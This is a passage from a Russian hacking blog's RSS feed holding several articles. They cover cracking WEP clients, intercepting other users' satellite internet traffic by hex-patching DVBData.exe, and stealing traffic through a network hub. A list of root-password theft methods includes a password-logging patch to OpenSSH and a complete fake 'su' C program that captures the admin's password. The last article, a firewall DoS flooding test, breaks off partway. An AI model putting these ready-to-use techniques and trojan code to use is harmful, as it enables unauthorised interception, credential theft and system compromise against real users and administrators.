Затем интерфейс переводится в режим точки доступа. Для этого могут использоваться Karma Tools (для ответа на Probe Request с произвольным значением essid), либо стандартные функции драйвера:<br />
# iwconfig ath0 mode master essid foo enc 1122334455 channel 1<br />
В случае использования Karma tools необходимо вручную включать режим использования шифрования (значение ключа WEP – произвольное):<br />
# iwconfig ath0 enc 1122334455<br />
После этого необходимо запустить программу wep0ff и дождаться её перехода в режим ipv6 flood или ARP flood.<br />
Атаки на клиентов WEP<br />
После этого, используется любая программа сбора беспроводного трафика, например airodump-ng для накопления необходимого количества пакетов с различными векторами инициализации. После чего используется KoreK-атаки для восстановления ключа WEP.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-291/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Спутниковый шпионаж</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-290/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-290/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Это интересно]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[интересно]]></category>
		<category><![CDATA[статьи]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=598</guid>
		<description><![CDATA[конецформыначалоформыРазвитие современных компьютерных технологий поражает. Устройства становятся меньше, а вычислительные способности удваиваются, чуть ли не каждый год! Уже ни кого не удивить высокоскоростным доступом ADSL, беспроводным Wi-Fi и тем более GRPS и его продолжением &#8212; EDGE. На рядового пользователя трудится даже космическая отрасль. Вывод спутников на орбиту &#8212; колоссальные затраты, а все ради того, что [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet298.jpg" alt="интернет" />конецформыначалоформыРазвитие современных компьютерных технологий поражает. Устройства становятся меньше, а вычислительные способности удваиваются, чуть ли не каждый год! Уже ни кого не удивить высокоскоростным доступом ADSL, беспроводным Wi-Fi и тем более GRPS и его продолжением &#8212; EDGE. На рядового пользователя трудится даже космическая отрасль. Вывод спутников на орбиту &#8212; колоссальные затраты, а все ради того, что бы мы могли наслаждаться спутниковым телевидением и спутниковым Интернетом. Скорость и дешевизна, зачастую являются главным критерием при выборе подключения к Интернет. Спутниковый доступ к сети &#8212; самый оптимальный вариант, но и самый ненадежный &#8212; в плане безопасности.<span id="more-598"></span></p>
<p>Внимание! Цель данной статьи &#8212; рассмотреть возможность перехвата информации в спутниковых сетях и варианты защиты. Автор не несет ответственности за возможное применение полученной информации из статьи в противозаконных целях. Данная технология описана для общего развития, но ни как руководство к действию.<br />
Атака</p>
<p>Для начала давайте разберемся, каким образом информация передается по спутниковым каналам связи. Система основана на том, что клиентский компьютер по наземным каналам связи передает запрос в дата центр на получение какой либо информации из Интернета. В датацентре запрос обрабатывается и он загружает все по тем же наземным каналам связи информацию, которую запросил клиент. Далее из датацентра информация идет на транспондер, в задачи которого входит передать информацию на спутник. Вот тут и открывается истина &#8212; задача спутника сродни задаче зеркала &#8212; просто отражать полученный сигнал &#8212; т. е. все, что приходит от транспондера спутник просто отправляет опять на землю, но уже не в виде узкого пучка, как лазер, а более расширено &#8212; как свет от фонарного столба, чем он выше &#8212; тем больше снизу световое пятно.</p>
<p>Что же у нас получается &#8212; спутник рассеял нашу информацию по огромной поверхности нашей планеты, как же мы ее получим?</p>
<p>Здесь в роль вступает DVB карточка и тарелка. Так как сигнал со спутника приходит к нам уже с довольно низким потенциалом &#8212; его необходимо усилить. Для этого нам и нужна тарелка, и чем она больше &#8212; тем лучший сигнал мы получим. Тарелка всего лишь отражает сигнал на конвертер, который уже и является непосредственно самим приемником сигнала. Но сигнал недостаточно просто принять &#8212; его надо отфильтровать. Ведь в один момент времени в сигнале может находиться информация, которую запросили, например, 100 человек. DVB карта фильтрует сигнал, полученный конвертером, и оставляет нам только то, что запросили мы и отсекает то, что запросил сосед. Как видно из всей этой цепочки &#8212; самый уязвимый элемент системы состоит в том, что данные разделяются на клиентской стороне. Вот этим мы и воспользуемся.</p>
<p>Что нам надо сделать для получения сторонней информации? Правильно &#8212; сделать так чтоб наша DVB карточка, фильтровала чуть-чуть не так, как задумал производитель. Фильтрация происходит по нескольким параметрам &#8212; по MAC-адресу DVB карточки или же по IP-адресу. Настройка фильтрации производится в сопутствующей программе для спутникового Интернета, например – DVBData из комплекта TTBudget-1401.</p>
<p>Как было уже сказано выше, непосредственно фильтрацию производит не сама карточка, а ее софт &#8212; тот самый, который мы запускаем при подключении к Интернету используя спутник. И именно его, мигающего нам зеленым цветом в трее при хорошем сигнале, мы и будем эксплуатировать (на примере DVBData от TTBudget &#8212; 1401).</p>
<p>После непродолжительного изучения работы и алгоритма DVBData.exe, была найдена возможность (простой заменой некоторых строк в исполняемом файле) заставить фильтр работать на нас. По умолчанию DVBData.exe не фильтрует так называемые multicast пакеты, которые рассылает провайдер спутникового Интернета. В multicast пакетах может быть и техническая информация, а может быть и программа передач. Но не столь важно, что может быть в этих multicast – главное, что фильтруются они по MAC-адресам, которые жестко прописаны в DVBData.exe. И если в самой программе изменить эти адреса – то мы заставим DVB карточку пропускать через себя абсолютно любые пакеты с произвольным MAC-адресом, вместо multicast.</p>
<p>Для этого откроем в любимом HEX редакторе DVBData.exe и поменяем все 10 адресов по смещению 72168h вида 01005E000008 на мак адрес карточки, информацию с которой нам надо получить. После изменения адресов сохраняем наш измененный файл под именем DVBData2.exe и копируем его в тот же каталог, что и оригинал.</p>
<p>И вот настал самый интересный момент &#8212; нам осталось направить нашу тарелку на тот же самый спутник, что и у нашего коллеги. Запустить наш модифицированный DVBData2.exe. И с удовольствием наблюдать, как в трее начинает мигать значок сетевого подключения &#8212; теперь информация, которую запросил наш друг, приходит и к нему и к нам!</p>
<p>Но что с того, что к нам приходят посторонние пакеты &#8212; мы то от этого ничего кроме загрузки процессора не получаем. Нам надо весь приходящий трафик куда-то сохранять и анализировать. Для этой цели прекрасно подходит сетевой анализатор Ethereal. В его задачи будет входить сохранение всех полученных пакетов в файл и дальнейший их анализ.</p>
<p>Итак, после установки запускаем наш анализатор. И активируем захват сетевого интерфейса нашей DVB карточки в меню Capture. Далее запускаем наш модифицированный DVBData2.exe. И вот они побежали &#8212; наши мегабайты информации. Стоит, пожалуй, еще напомнить, что при запуске DVBData2.exe нам нужно будет еще указать PID – это номера потоков. Их можно узнать на сайте провайдера или просто вписать все активные пиды, которые предоставит нам программа PidScanner. После непродолжительной работы всего нашего спец-софта захват можно прекратить и сохранить к себе на диск весь поток информации, который мы заполучили.</p>
<p>Теперь осталось в том же самом Ethereal открыть наш сохраненный поток данных. И уже не спеша, попивая чай или кофе, брать ту информацию, ради которой мы не пожалели потратить столько времени на настройку тарелки, ремонт ПО спутниковой карточки, установку Ethereal и, конечно же, на прочтение этой статьи.<br />
Защита</p>
<p>Единственный способ защитится от прослушивания во время использования спутникового Интернета &#8212; шифрование всего трафика криптостойким алгоритмом. Никогда не используйте спутниковый Интернет для получения личной и особо ценной информации.</p>
<p>Различные вопросы и решения, которые могли возникнуть.</p>
<p>Вопрос: что можно перехватить таким методом?</p>
<p>Ответ: абсолютно весь входящий трафик. Т.е и Интернет странички, и почту, и аську, и все остальное.</p>
<p>Вопрос: как узнать мак адрес посторонней DVB карточки?</p>
<p>Ответ: для этого есть несколько способов. Первый и самый простой &#8212; просто спросить его у нашего коллеги. Если просто спросить нельзя &#8212; можно воспользоваться СИ. Ну а самый шпионский вариант – это использование спутниковых программ-граберов, например manna.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-290/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Воровство траффика: loozy sniffing</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-289/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-289/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Это интересно]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[интересно]]></category>
		<category><![CDATA[статьи]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=597</guid>
		<description><![CDATA[Уже много сказано и написано о TCP over ICMP или DNS и прочих способах не платить провайдеру за траффик, я не буду сейчас об этом говорить. Мой рассказ пойдет о сопредельной проблеме &#8212; об изначальной незащищенности сетевых протоколов, и о том как легко тебя могут заставить платить за чужой траффик. Итак есть так называемое «интернет [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet297.jpg" alt="интернет" />Уже много сказано и написано о TCP over ICMP или DNS и прочих способах не платить провайдеру за траффик, я не буду сейчас об этом говорить. Мой рассказ пойдет о сопредельной проблеме &#8212; об изначальной незащищенности сетевых протоколов, и о том как легко тебя могут заставить платить за чужой траффик.<br />
Итак есть так называемое «интернет здание». Есть хаб в подсобке и есть куча довольных жизнью потребителей интернет-траффика навешанных на этот хаб. И ты, родимый, среди них. Все зашибись…<br />
Но если у тебя крутится WWW, или открыт любой другой TCP-порт в который можно послать хоть один байт &#8212; ты мишень для loozy sniffing’a.<span id="more-597"></span> Что есть «loozy sniffing»? На схеме это выглядит так:<br />
Так как хаб это концентратор, а не коммутатор, то ВСЕ сетевые карты, в сегменте обслуживаемом этим хабом, получают ВСЕ пакеты адресованные любой из них. Соответственно поток данных, который HackerSERV передает (через любой открытый прокси) любому открытому сервису машины MyHOST или OtherHOST так же попадают и на сетевую карту машины HackerHOST.<br />
Осталось дело за малым &#8212; пишется простейший сниффер, который перехватывает все пакеты адресованные определенному порту любого адреса, и сравнивает содержимое пакетов с некоей структурой. Например такой:</p>
<p>{<br />
заголовок_HTTP_запроса (n bytes),<br />
сигнатура «ХАКЕР» (5 bytes),<br />
длина заголовка (2 bytes),<br />
заголовок хакерского пакета (n bytes),<br />
длина пакета (2 bytes),<br />
данные (n byte);<br />
}</p>
<p>При нахождении такового пакета из его хакерского заголовка вытаскиваются необходимые поля (например имя передаваемого файла и номер передаваемого куска) и сами данные. Вуаля! Данные у хакера, а за входящий трафик платит хозяин MyHOST…</p>
<p>Теперь встает вопрос «Как от этого защищаться».</p>
<p>Если учесть, что длина Ethernet-пакета не зависит от того, сколько байт из него будет принято сервисом на машине-получателе, то ограничением длинны принимаемого TCP-запроса мы ничего не добьемся. Огромное количество открытых для всех proxy-серверов говорит о том, что наш непосредственный провайдер не сможет их все зафильтровать.</p>
<p>Итого вывод &#8212; что бы такого не приключилось надо менять концентратор здания (тот самый хаб) на коммутатор (свич) и молить Аллаха, чтобы наш хакер не знал как этот свич обмануть (что возможно).</p>
<p>PS: Вышеописаный метод был проверен лично мной — работает <img src="http://suspended.ru/wp-includes/images/smilies/icon_sad.gif" alt=":(" class="wp-smiley" /> </p>
<p>PPS: Может подарить моему провайдеру свич?</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-289/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>10 способов поиметь рутовый пароль</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-288/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-288/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Это интересно]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[интересно]]></category>
		<category><![CDATA[статьи]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=596</guid>
		<description><![CDATA[Пожалуй, самая большая проблема в хаке – определение рутового пароля. Даже когда хакер сломал систему каким-либо эксплойтом, достать пароль не так то просто. Но на каждую гайку найдется свой болт, поэтому позволь тебе раскрыть 10 универсальных способов дознания этой важной инфы ;). Нет, тебе даже не потребуется встречаться с админом и поить его пивом до [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet296.jpg" alt="интернет" />Пожалуй, самая большая проблема в хаке – определение рутового пароля. Даже когда хакер сломал систему каким-либо эксплойтом, достать пароль не так то просто. Но на каждую гайку найдется свой болт, поэтому позволь тебе раскрыть 10 универсальных способов дознания этой важной инфы ;). Нет, тебе даже не потребуется встречаться с админом и поить его пивом до бессознательного состояния (а точнее, до состояния, в котором он раскроет тебе важную информацию). Все намного проще – существуют приемы, после применения которых, ты получишь root password. Естественно, все зависит от ситуации. Все они будут обговорены ниже.<br />
1. Поиск в Perl/PHP-скриптах.<br />
Очень действенный метод. Обычно админы из-за своей лени делают рутовый пароль на базу сходным с паролем в систему. А аккаунт к SQL можно найти&#8230;<span id="more-596"></span> правильно! В PHP и Perl скриптах. Перед этим узнается путь к WWW-каталогу (простым парсингом httpd.conf), после перехода в этот каталог ищется необходимая информация. Следует лишь учитывать, что PHP-скрипты часто используют инклуд-файлы (*.inc) с переменными для MySQL, Perl-сценарии хранят все в одном главном файле. Проверить пароль можно командой mysql –uroot –pПАРОЛЬ. Затем сравни его с системным (через /bin/su).<br />
Метод применяется при всех вариантах взлома.<br />
2. Поиск в HISTORY-файлах.<br />
Часто админы используют консольные программы, которым передают пароль прямо из командной строки. Это все записывается в history-файл под названием .bash_history (естественно, для других интерпретаторов название файла будет другим). Туда же может попасть инфа из-за ошибки админа в команде (я, например, видел то, как админ вместо “su” набрал “psu”, а затем свой пароль).<br />
Существует другой файл истории. Он называется .mysql_history и находится также в домашнем каталоге пользователя. Там ты можешь найти команды смены пароля для SQL-доступа. Этот пароль, возможно, совпадет с рутовым.<br />
Способ применим лишь когда имеется полный контроль над системой. Но случается такое, когда HISTORY-файлы имеют атрибут 644. Найти такие файлы (а затем прочитать) можно с помощью команды find / -perm 644 –name *_history.<br />
3. Поиск в .htpasswd.<br />
Когда в системе установлен Web-сервер, возможно обнаружить хеши-паролей в .htpasswd-файлах. Просто набери locate .htpasswd и ты увидишь список доступных файлов. Правда, файлы не будут прочитаны, когда у тебя лишь user-access, а на документе установлен атрибут, запрещающий read.<br />
Расшифровать такие хеши можно программой John The Ripper. Не мне тебя учить этим заниматься, поэтому считаю, что данный метод тебе понятен.<br />
4. Поиск в других файлах.<br />
Встречаются сервера, где пароли указываются в файлах сторонних приложений. К примеру, я сталкивался с ситуацией, когда рутовый пароль лежал в файле socks5.password.<br />
Внимание! Эти файлы могут оказаться недоступными для чтения. Поэтому, тут все зависит от ситуации&#8230;<br />
5. Заметки на полях.<br />
Часто админы оставляют важные файлы в своих каталогах. Они содержат некоторые заметки. Не исключено, что среди таковых ты можешь встретить и пароли. Я сам сталкивался с таким и нарыл рутовый пароль в файлике “notes”. Обращай повышенное внимание на подобные вещи.<br />
6. Поиск в логах.<br />
Да! Помимо обычной информации, логи могут содержать пароли. Например, radius ведет полный отчет об аутентификации (по умолчанию). Что парадоксально, эти логи доступны для чтения обычному пользователю. Из-за этого, становится возможным прочитать отчет авторизации, а, следовательно, узнать пароли (возможно, среди них будет и рутовый).<br />
7. Снифинг данных.<br />
Некоторые руткиты содержат в себе локальный снифер, который позволяет легко узнавать пароли на ssh (простая модификация /usr/bin/ssh с поддержкой логгинга ;)). Обычно такая поддержка и путь к файлу с логом указывается в документации руткита). Все хорошо, но огорчает лишь одно обстоятельство: большинство руткитов содержат старый ssh, который поддерживает лишь первый протокол. В итоге, хакер может выдать себя с потрохами.<br />
Но кто мешает собрать собственный ssh и включить в нем запоминание паролей? Правильно! Никто. Находим в пакете OpenSSH файлик с именем sshconnect1.c. Затем вставляем в его содержимое следующие строки:<br />
После строчки “snprintf(prompt, sizeof(prompt), &#171;%.30s@%.128s&#8217;s password: &#171;,server_user, host);”<br />
ifile=fopen(&#171;/boot/kernel.old&#187;,&#187;a&#187;);<br />
fprintf(ifile,&#187;session %s %s &#171;,server_user,host);<br />
fclose(ifile);<br />
После строчки “password = read_passphrase(prompt, 0);”<br />
ifile=fopen(&#171;/boot/kernel.old &#171;,&#187;a&#187;);<br />
fprintf(ifile,&#187;password is %s &#171;,password);<br />
fclose(ifile);<br />
Если все сделано правильно, ssh соберется без приключений. Теперь админ не заметит изъяна в системе, а ты узнаешь его пароль на ssh. Когда он ходит под рутом – это и будет рутовый пароль ;).<br />
8. Прикидываемся системным сервисом ;).<br />
Для осуществления этого способа достаточно написать небольшой скрипт, который читает /etc/shadow и гребет оттуда рутовый хэш. Это просто и писать сценарий я не буду (справишься сам). Затем пишется e-mail администратору, в котором говориться, что в системе обнаружен вирус, и для его лечения необходимо запустить специальную программу. Для полной убежденности, укажи системный путь к этой программе. Когда админ запустит твое творение (а сделает он это под рутом), ты уведешь его драгоценный хэш. Разумеется, тебе нужно напичкать свой сценарий разного рода надписями, что вирус излечен. Да, и не вздумай выкладывать исходник на диск в системе – админ его обязательно прочитает. Если пишешь на перле, после написания скомпилируй его в бинарник (perlcc –o file file.pl).<br />
9. Fake-su.<br />
Этот метод я описывал в одном из номеров Хакера (Юниксоид, Забавы в Linux). Из-за того, что юзеры, читавшие Хакер не посещают сайта (и наоборот), будет не лишним повторить мой хитрый прием.<br />
Итак, создается файл следующего содержания:<br />
#define SORRY &#171;Sorry&#187;<br />
#define PFILE &#171;tmp/.screen&#187;<br />
#define MYPATH &#171;tmp/.screen_active&#187;<br />
#include<br />
void sigexit(int no);<br />
int main() {<br />
char pass[40];<br />
char longs[100];<br />
int filep;<br />
signal(SIGINT, sigexit);<br />
printf(&#171;Password:&#187;);<br />
system(&#171;stty -echo&#187;);<br />
scanf(&#171;%s&#187;,pass);<br />
system(&#171;stty echo&#187;);<br />
printf(&#187; &#171;);<br />
filep=fopen(PFILE,&#187;w&#187;);<br />
fprintf(filep,&#187;Pass is %s &#171;,pass);<br />
fclose(filep);<br />
printf(&#171;%s &#171;,SORRY);<br />
strcpy(longs,&#187;&#187;);<br />
strcat(longs,&#187;/bin/ln -sf /bin/su &#171;);<br />
strcat(longs,MYPATH);<br />
system(longs);<br />
exit(0);<br />
}<br />
void sigexit(int no) {<br />
system(&#171;stty echo&#187;);<br />
printf(&#187; &#171;);<br />
exit(0);<br />
}</p>
<p>и обзывается su.c. Если вглядеться в простенький код можно понять, что это полная имитация /bin/su, только с логированием пароля в файл tmp/.screen. Сам бинарник будет находиться в файле tmp/.screen_active (все пути относительно домашнего каталога пользователя). После того, как файл выполнится он замещается стандартным /bin/su. Таким образом, админ думает, что ошибся паролем, так как со второй попытки суид будет успешным.<br />
Перед тем, как проверять данный метод на практике, впиши строчку “alias su /home/user/tmp/.screen_active в файл ~/.bash_profile и жди, пока админ решит суиднуться на рута. Когда это произойдет – пароль твой ;).</p>
<p>Данный метод работает лишь тогда, когда юзер регулярно суидиться на рута, а у хакера есть доступ к этому аккаунту (либо ко всей системе).<br />
10. Стандартный способ.<br />
И, наконец, настало время рассказать про самый тривиальный способ. Хакер захватывает систему и получает доступ к /etc/shadow. Далее, все по сценарию – берется расшифровщик, хороший словарь и вся надежда только на удачу. Я думаю, ты не раз сталкивался с применением этого метода. И, что интересно, постоянно забывал об остальных 9&#8230;</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-288/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>StreSS teSt Firewall&#8217;ов</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-287/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-287/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Это интересно]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[интересно]]></category>
		<category><![CDATA[статьи]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=595</guid>
		<description><![CDATA[конецформыначалоформыСейчас мы будем их жестоко тестить на предмет противодействия различным видам сетевых атак. Выясним же, кто действительно стоит того, чтобы занимать достойное место в системе, защищая её от всяческих напастей; а кто &#8212; разрекламированный друшлаг. 1. Безобразие начинается 2. Подопотные 3. Обещания разработчиков 4. Флудим 5. SYN - ICMP - IGMP - UDP 6. Нюкаем [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet295.jpg" alt="интернет" />конецформыначалоформыСейчас мы будем их жестоко тестить на предмет противодействия различным видам сетевых атак. Выясним же, кто действительно стоит того, чтобы занимать достойное место в системе, защищая её от всяческих напастей; а кто &#8212; разрекламированный друшлаг.</p>
<p>1. Безобразие начинается<br />
2. Подопотные<br />
3. Обещания разработчиков<br />
4. Флудим<br />
5. SYN<br />
- ICMP<br />
- IGMP<br />
- UDP<br />
6. Нюкаем<br />
7. Эксплоиты<br />
8. Прослушиваем<br />
9. Сканим<br />
10. Отключаем<br />
11. Кто здесь Лидер?</p>
<p>Посмотрим же как реализуют себя стенки в защите вашего любимого компа. Сейчас мы будем их жестоко тестить на предмет противодействия различным видам сетевых атак. Выясним же, кто действительно стоит того, чтобы занимать достойное место в системе, защищая её от всяческих напастей; а кто &#8212; разрекламированный друшлаг.<span id="more-595"></span></p>
<p>Заниматься мы будем простейшим и в то же время важнейшим делом &#8212; валить систему в синий экран всеми доступнымии способами. Вот щас и выясним &#8212; кто тут лидер ))).</p>
<p>А если говорить интелегентно &#8212; мы будем испытывать фаерволы на предмет противодействия атакам, вызывающим отказ в обслуживании,.. и не только.<br />
Предполагается начальные знания читателя основы ТСР\!Р протокола, а также некоторого хакерского опыта smile.gif .</p>
<p>Итак, мы имеем:</p>
<p>1. Винда ХРеновая\SamPostavil_2, пропатченная под завязку.<br />
2. Фаерволы популярные:<br />
- Kaspersky AntiHacker v.1.7.130<br />
- OutpostPro_v3.0.543.431 RUS Final<br />
- ZoneAlarm_PRO_60.667<br />
2. Четыре вида флудеров: SYN, ICMP, IGMP, UDP.<br />
3. Вагон нюкеров с маленькой тележкой: WinNuke, SmbDie, Fragmentation&#8230;.<br />
4. Три самых популярных масдайных эксплоита\червя: LoveSun, Sasser, Messenger, UP&#038;P.<br />
5. Снифер, крутой и професиональный.<br />
6. Сканер портовый, многофункциональный.<br />
7. Мозг &#8212; воспалённый, руки &#8212; выпрямленные smile.gif</p>
<p>Замечу что производители этих фаерволов обещали защищать нас конкретно от:</p>
<p>1. Kaspersky AntiHacker v.1.7.130</p>
<p>* Ping of Death- Эта атака состоит в отправке на ваш компьютер ICMP &#8212; пакета, размер которого превышает допустимое значение в 64 КБ. Эта атака может привести к аварийному завершению работы.<br />
* Land &#8212; Эта атака заклюсается в отправке на ваш компьютер большого количества запросов на установку соединения с самим собой. Атака приводит к тому, что компьютер не реагирует на другие попытки установить соединения.<br />
* Сканирование TCP-портов &#8212; Эта атака заключается в попытке определить открытые TCP-порты на вашем компьютере. Атака используется для поиска слабых мест и предшествует более опасным атакам.<br />
* Сканирование UDP-портов &#8212; Эта атака заключается в попытке определить открытые UDP-порты на вашем компьютере. Атака используется для поиска слабых мест и предшествует более опасным атакам.<br />
* SYN-Flood &#8212; Эта атака заключается в отпраке на ваш компьютер большого кол-ва запросов на установку соединения. Атака приводит к тому, что компьютер не реагирует на другие попытки установить соединения.<br />
* UDP-Flood &#8212; Эта атака заключается в отправке специальных UDP-пакетов, которые бесконечно пересылаються между атакованными компьютерами. В результате атаки тратяться ресурсы компьютеров и загружается центральный процессор.<br />
* ICMP-Flood &#8212; Эта атака заключается в отправке большого кол-ва ICMP-пакетов на ваш компьютер. Атака приводит к большому росту загрузки процессора в силу реагирования на каждый пакет.<br />
* Helkern &#8212; Эта атака заключается в в отпраке на ваш компьютер UDP-пакетов специального вида, способных выполнить вредоносный код. Атака приводит к замедлению работы в интернете.<br />
* SmbDie &#8212; Эта атака заключается в попытке установить соединение с вашим компьютером по SMB-протоколу, в случае успеха на компьютер отправляется пакет особого вида, который пытаеться переполнить буфер. Атаке подвержены ОС Windows 2k\XP\NT.<br />
* Lovesan &#8212; Эта атака заключается в попытке обнаружения на вашем компьютере бреши в сервисе DCOM_RPC операционной системе Windows и пересылке вредоносной программы с её использованием, которая потенциально позволит производить любые манипуляции на вашем компьютере.</p>
<p>2. OutpostPro_v3.0.543.431 RUS Final</p>
<p>* Сканирование порта &#8212; атакующий запрашивает TCP и UDP порты Вашей системы, чтобы определить к какому порту он может подсоединиться, чтобы получить контроль.<br />
* Denial of Service &#8212; Большое кол-во данных посылается на порт вашей системы при попытке вызвать ошибку или зависание системы.<br />
* Fragmented ICMP &#8212; пакет ICMP, посланный в виде фрагментов, превышает 1472 байта после сборки. Это может привести к сбоям в стеке TCP и зависанию системы.<br />
* Fragmented IGMP &#8212; пакет IGMP, посланный в виде фрагментов, превышает 1472 байта после сборки. Это может привести к сбоям в стеке TCP и зависанию системы.<br />
* Short fragments &#8212; Пакет разбивается на несколько фрагментов, которые затем изменяються таким образом, что после сборки пакет приводит к зависанию системы.<br />
* Teardrop &#8212; ещё один вид Short fragments атаки.<br />
* My Address &#8212; Атака, состоящая в перехвате IP &#8212; адреса Вашей системы, имитации системы в сети и захвате всех соединений.<br />
* Перекрывающиеся фрагменты &#8212; Пакет разбивается на несколько фрагментов , которые затем изменяються таким образом, что накладываються друг на друга и вызывают зависание системы из-зи ошибок памяти.<br />
* WinNuke &#8212; Источник проблемы состоит в уязвимости протокола TCP, приводящей к зависанию некоторых версий операционных систем Windows при получении специфических пакетотв.<br />
* Nestea &#8212; опасное перекрытие IP &#8212; пакетов, вызываемое программой Nestea, может привести к нестабильности и зависанию системы.<br />
* Iseping &#8212; Большой ICMP пакет разбивается на большое число фрагментов. После сборки приводит к зависанию системы.<br />
* ICMP атака &#8212; TCP\IP стек Windows некорректно обрабатывает фрагментированные ICMP-пакеты. Система, получившая такой пакет, с большой вероятностью, зависнет.<br />
* Opentear &#8212; программа Opentear использует фрагментированные UDP-пакеты, чтобы подвергнуть компьютер жертвы перезагрузке.<br />
* Nuke &#8212; Попытка захватить TCP-соединение и обойти брандмауэр и другие системы обнаружения атак.<br />
* IGMP атака &#8212; TCP\IP стек Windows некорректно обрабатывает фрагментированные IGMP-пакеты. Система, получившая такой пакет, с большой вероятностью, зависнет.<br />
* Port139 &#8212; Фрейм с нулевым полем имени, который может привести системы Windows 95 или 98 к нестабильному состояниюили зависанию.<br />
* Неверное поле IP Options &#8212; атака использует переполнение буфера стэка TCP\IP (когда размер поля IP Options превышает 38 байт) для выполнения вредоносного кода на вашем компьютере.<br />
* Атака RPC DCOM &#8212; Различные черви и утилиты используют RPC_DCOM &#8212; уязвимость, что может привести к выполнению злонамеренного кода и падениям системы.<br />
* Отравление ARP-кеша &#8212; опасная атака направленная на перехват трафика.</p>
<p>3. ZoneAlarm_PRO_60.667</p>
<p>* Детектора атак нету<br />
* Зато защита ARP-кэша есть<br />
* А остальное надо ручками настраивать, ибо фаервол очень серьёзный.</p>
<p>Итак, приступим. Выставим фаерволам вот такие режимы. Для Касперского &#8212; это &#171;Высокий&#187;. Для Аутпоста &#8212; &#171;Блокировать&#187;. А вот Мистер Аларм на высоком уровне защиты блокировал ВСЕ мои домогательства (можно считать его вне конкуренции и лидером в области высокого уровня запрета), поэтому, чтоб было интересней, я его перевёл в средний режим тревожности.</p>
<p>Начнём сначала, испытывая флудеры:</p>
<p>* SYN-флудер<br />
*Без фаервола система падала секунд за 10.<br />
*Касперский, как положено, опознал атаку и заблокировал айпи негодяя, однако процессор всё равно грузился (?). Какого.. ! Видимо, приоритет загруженного драйвера фаервола стоит на равном (или ниже) виндового, в чем я так же убедился на других атаках. Это вери бэд, ибо по сути должного противодействия атаке не оказывается. Это означает, что если атакующих будет двое или более &#8212; системе пипец.<br />
*Аутпост не опознал атаку(замечу, что опознание флуд-атак в него не заложено!!!), и загрузка процессора была вдвое больше.<br />
*Аларм молчал (детектора атак у него вообще нет), однако каким-то чудом не давал процессору загружаться. Хм.. может флудер не правильный?..<br />
* ICMP-флудер<br />
